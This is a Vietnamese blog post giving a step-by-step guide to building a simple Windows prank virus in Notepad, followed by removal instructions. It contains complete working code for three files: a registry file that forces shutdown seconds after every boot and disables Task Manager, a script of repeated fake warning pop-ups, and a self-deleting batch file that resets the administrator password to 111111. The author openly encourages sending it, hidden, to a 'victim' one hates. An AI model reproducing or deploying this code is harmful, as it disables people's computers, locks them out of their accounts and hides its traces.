Hướng dẫn Viết Virus Bằng Notepad, -Thận trọng hi sử dụng

Con virus này sẽ tự động reset lại máy sau vài giây khi khởi động máy tính làm cho người dùng cảm thấy khó chịu. Và còn khóa cả Task Manager nữa. Cái này không send lung tung được đâu nhá. Chỉ send cho victim nào mà mình căm thù . Cách giải thì ai có nhu cầu mình sẽ post nốt (thanks cái thì post hj hj) Cách viết đơn giản thôi
Mở Notapad lên và copy đoạn code sau vào

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]
"Shutdown"="Shutdown.exe -s -f -t 05"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System]
"DisableTaskMgr"=dword:1
Lưu lại với tên thu.reg
Xong lại mở cái mới copy tiếp đoạn code sau vào
Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")
Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")Text1=msgbox("vrius!!!!!virus!!!! please open mylove.bat now",42,"Warning! Virus Protected!")

Và lưu lại với tên att.vbs
Tiếp tục với notapad với đoạn code sau
title Programs

cls
net user administrator 111111
cls
attrib -r -h -s *.*
cls
regedit /s thu.reg
cls
att.vbs
cls
del thu.reg
del att.vbs
del mylove.bat
cls

Lưu lại với tên là mylove.bat
copy 3 file này vào trong 1 folder
chọn hidden cho att.vbs và thu.reg còn mylove.bat để nguyên
thế là xong , chỉ cần victim mở folder ra click vào mylove.bat
khi đó nó tự thay đổi registry , từ lần sau khởi động lại máy là chỉ sau 05 giây là máy lại shutdown , cứ kđ đc 5 giây lại tắt .
bạn có thể thay đổi tg tắt máy trong thu.reg :

"Shutdown"="Shutdown.exe -s -f -t 05" thay 05 = 10 hay 60 hay 120 hay chỉ là 01 ...tùy bạn .
lúc này có muốn vào admin cũng không được vì đã bị đặt password là :111111 rồi .
con mylove.bat này chạy xong tự động xóa chính mình không để lại giấu vết.
-------THE END-------

Post luôn cách giải không ai bị dính thù em đến chết mất
Nếu như đặt chế độ trong vòng vài phút mới reset lại máy thì download cái này về giải nén ra và chạy file cuuvirus.bat
LINK TẢI: GIẢI VIRUS.RAR-999999GB
autoshutdown sẽ bị vô hiệu hóa , tiếp tục bạn vào run gõ regedit - ok
tìm khóa : HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run

xóa file tên Shutdown đi là xong.
tìm tiếp :HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System
mở file DisableTaskMgr sửa giá trị thành 0.
còn admin bị khóa thì vào bằng pass: 111111 rồi remove pass đi -----> XONG
Nếu như đặt thời gian là 01 hay 02 (s) thì download cái này
Cấp cứu.999GB

lưu vào ổ D:\ hoặc E:\,khi MÁY ĐÃ DÍNH VÀ AUTOSHUTDOWN sau 1 hay 2 giây thì cách cứu đây : hãy vào admin với pass trên rồi mở file vừa lưu ra chạy file capcuu.bat rồi reset lại máy .khi reset lại autoshutdown bị capcuu.bat tự động vô hiệu hóa .Lúc này lại mở run tìm khóa : HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run
xóa file tên Shutdown đi là xong.
tìm tiếp :HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System
mở file DisableTaskMgr sửa giá trị thành 0.
xong việc trên thì chạy file hoantat.bat trong bản VIRUSGIA, lưu vào ổ D:\ hoặc E:\ l

Lúc này là ok . hãy cảm cảm nhận :v
By NQ.Cường

Post a Comment

0 Comments